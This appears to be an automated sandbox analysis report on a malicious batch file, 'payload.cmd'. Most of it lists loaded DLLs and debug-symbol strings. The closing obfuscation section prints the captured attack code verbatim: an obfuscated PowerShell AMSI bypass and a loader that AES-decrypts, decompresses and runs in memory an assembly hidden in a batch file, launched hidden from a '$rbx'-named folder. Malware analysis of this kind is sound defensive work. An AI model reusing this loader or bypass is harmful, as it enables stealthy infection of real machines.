Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: payload.cmdStatic file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
